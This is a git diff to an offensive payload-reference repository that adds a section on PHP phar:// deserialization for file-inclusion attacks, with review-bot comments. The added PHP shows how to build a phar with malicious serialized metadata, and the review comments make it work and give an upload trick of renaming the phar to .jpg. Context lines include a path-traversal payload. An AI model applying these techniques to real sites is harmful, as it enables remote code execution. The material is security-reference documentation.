diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index 1c9387a..8a51ec6 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -12,6 +12,7 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e * [Wrapper data://](#wrapper-data) * [Wrapper expect://](#wrapper-expect) * [Wrapper input://](#wrapper-input) + * [Wrapper phar://](#wrapper-phar) * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) * [LFI to RCE via upload](#lfi-to-rce-via-upload) @@ -185,6 +186,39 @@ http://example.com/index.php?page=php://input POST DATA: ``` +### Wrapper phar:// + +Create a phar file with a serialized object in its meta-data. + +```php +// create new Phar +$phar = new Phar('test.phar'); +$phar->startBuffering(); +$phar->addFromString('test.txt', 'text'); +$phar->setStub(''); + +// add object of any class as meta data +class AnyClass {} +$object = new AnyClass; +$object->data = 'rips'; +$phar->setMetadata($object); +$phar->stopBuffering(); +``` + +If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked + +```php +class AnyClass { + function __destruct() { + echo $this->data; + } +} +// output: rips +include('phar://test.phar'); +``` + +NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more. + ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) 
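Review bot: in the phar-creation snippet of the `Wrapper phar://` hunk, `$phar->setStub('');` sets an empty stub, and Phar refuses to flush a stub that does not contain the `__HALT_COMPILER();` marker, so `test.phar` is never written; use `$phar->setStub('<?php __HALT_COMPILER(); ?>');`. The snippet also only works with `phar.readonly=0` (it is on by default), so the section should say to run it as `php -d phar.readonly=0 create.php`. Two smaller points in the same hunk: the sentence ending "those methods are automatically invoked" is missing its full stop, and the closing NOTE is vaguer than it needs to be; state that any function that stats or opens the path through the wrapper (`file_exists`, `is_file`, `filesize`, `file_get_contents`, `fopen`, `include`, ...) triggers the unserialize, and that the `.phar` name is only required by the `Phar` constructor at creation time: the archive can be renamed to any extension (for example `.jpg`) before upload, because the `phar://` wrapper parses the file content, not its name.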
@@ -266,4 +300,8 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html) * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) -* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) \ No newline at end of file +* [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) +* [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) +* [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379) +* [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) +* [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) \ No newline at end of file diff --git a/PHP serialization/README.md b/PHP serialization/README.md index 975492e..e897318 100644 --- a/PHP serialization/README.md +++ b/PHP serialization/README.md 
@@ -2,6 +2,8 @@ PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. +Also you should check the `Wrapper Phar://` in [File Inclusion - Path Traversal](github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-phar) which use a PHP object injection. + ## Exploit with the __wakeup in the unserialize function Vulnerable code:
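Review bot: the reference hunk in `File Inclusion - Path Traversal/README.md` still leaves the file without a trailing newline (`\ No newline at end of file` on both the `-` and `+` side), so the next appended reference will produce the same noisy one-line rewrite; add the newline now. The new link text `Чтение файлов => unserialize !` should carry an English gloss for readers of this English README, e.g. `Reading files => unserialize! (rdot.org, in Russian)`, so the reference can be recognised without following it.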
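Review bot: in the `PHP serialization/README.md` hunk the link target `github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-phar` has no scheme, so markdown renders it as a path relative to the current page and the link breaks; either prefix `https://` or use a repository-relative link such as `../File%20Inclusion%20-%20Path%20Traversal/README.md#wrapper-phar`. The sentence also has a grammar slip (`which use a PHP object injection` should read `which uses PHP object injection`, and `Also you should check` reads better as `See also`), and it names the section `Wrapper Phar://` while the heading added in the other file is `Wrapper phar://`; keep the casing identical so the anchor and the text match.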